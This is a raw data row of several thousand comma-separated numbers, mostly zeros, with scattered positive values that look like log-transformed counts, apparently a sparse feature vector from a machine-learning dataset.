0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.8398715690385097, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 2.1972245773362196, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 3.6635616461296467, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0.0, 0, 0, 0.0, 1.9459101490553132, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0.0, 2.995732273553991, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 1.7412592803704001, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 2.0794415416798357, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.871201010907891, 3.2188758248682006, 0, 1.6094379124341003, 0.0, 0.0, 0, 0.0, 5.0301047650807, 4.605170185988092, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 2.302585092994046, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 1.6094379124341003, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 2.3978952727983707, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.6931471805599453, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 5.101797476893978, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 3.2188758248682006, 0.0, 3.6375861597263857, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.8501476017100584, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 4.394449154672439, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 4.77912349311153, 1.3862943611198906, 0.0, 0, 1.791759469228055, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 3.6375861597263857, 0.0, 4.394449154672439, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 1.0986122886681098, 0, 0, 0.0, 0.0, 0, 0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.6931471805599453, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.791759469228055, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.3862943611198906, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 12.332621592519935, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0, 2.4849066497880004, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0, 1.0986122886681098, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 4.06534854782536, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 2.5649493574615367, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 3.7612001156935624, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 3.7376696182833684, 0.0, 0.0, 0.0, 5.390770307485499, 0.0, 0.0, 0.0, 0, 0, 0.0, 3.0841946160253872, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0, 1.0986122886681098, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 1.6094379124341003, 0.0, 0.0, 0.0, 0, 0.0, 1.0986122886681098, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.1972245773362196, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 2.302585092994046, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.0986122886681098, 2.4849066497880004, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 2.0794415416798357, 0.0, 1.3862943611198906, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 1.9459101490553132, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0, 0.0, 0.0, 0, 0, 0.0, 0, 0, 0, 0, 0, 0, 0.0, 0, 0.0, 0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0, 0.0, 0.0, 0.0, 0.0, 0, 0.0, 0.0, 